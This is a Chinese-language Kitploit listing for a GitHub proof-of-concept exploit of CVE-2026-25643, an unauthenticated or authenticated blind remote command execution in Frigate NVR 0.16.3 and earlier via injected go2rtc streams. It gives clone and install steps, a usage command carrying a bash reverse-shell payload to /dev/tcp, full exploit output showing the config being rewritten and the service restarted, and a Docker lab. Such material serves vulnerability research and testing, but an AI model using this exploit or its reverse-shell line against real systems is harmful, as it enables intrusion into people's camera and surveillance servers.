Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-25643 — CVE-2026-25643:Frigate ≤0.16.3 通过 go2rtc exec 注入实现盲式 RCE | Kitploit
工具/GitHubGitHub/joshuavanderpoll/cve-2026-25643
漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubjoshuavanderpoll/cve-2026-25643

CVE-2026-25643

CVE-2026-25643:Frigate ≤0.16.3 通过 go2rtc exec 注入实现盲式 RCE

查看仓库网站
75个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Frigate NVR ≤ 0.16.3 盲注 RCE 漏洞利用(CVE-2026-25643)PoC

Python

📜 描述

此 Python 漏洞利用针对 Frigate NVR 0.16.3 及更早版本中的一个严重配置操纵漏洞(涵盖已认证和未认证两条路径)。通过注入恶意的 go2rtc 流和一个伪造的摄像头条目,它可在服务重启时以 Frigate 进程身份触发任意命令执行——无需反向 Shell 或输出捕获。

🛠️ 安装

[!NOTE] 为确保项目依赖拥有干净且隔离的环境,建议使用 Python 的 venv 模块。

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python -m venv .venv 
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ 用法

root@kitploit:~
python3 CVE-2026-25643.py -c "bash -i >& /dev/tcp/host.docker.internal/1111 0>&1" --url http://localhost:5001/

 目标 : http://localhost:5001
 命令: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1

[!] 未提供凭据 → 尝试未认证访问
[*] 获取当前配置(/api/config/raw)...
[*] 配置获取 → HTTP 200
[*] 收到 914 字节
[*] 配置为 JSON 包装 → 已解包
[+] 配置解析成功(7 个顶层键)
[*] 准备载荷 → 正在执行:bash -i >& /dev/tcp/host.docker.internal/1111 0>&1
[*] 使用的载荷:bash -c 'bash -i >& /dev/tcp/host.docker.internal/1111 0>&1'
[+] 已注入恶意流 → debug_cmd
[+] 已注入触发摄像头 → trigger_exec
[*] 正在发送修改后的配置(861 字节),选项:restart
[*] 配置保存 → HTTP 200
[+] 配置已接受(服务器应会重启)

============================================================
 载荷已发送!命令应在 go2rtc 初始化 / 摄像头探测期间执行。
 请注意:
 • 输出不会被捕获(盲执行)
 • 命令以用户/frigate 进程身份运行
 • 重启期间可能会多次执行
============================================================

🐋 Docker PoC

root@kitploit:~
cd docker/
docker compose down
docker compose up -d
# 你可以在 --url http://127.0.0.1:5001 进行测试

💻 示例

执行 PoC 接收连接

🕵🏼 参考

  • 灵感来自 https://github.com/jduardo2704/CVE-2026-25643-Frigate-RCE

📢 免责声明

此工具仅用于教育和研究目的。创建者不对因使用该工具而造成的任何滥用或损害承担责任。

下载工具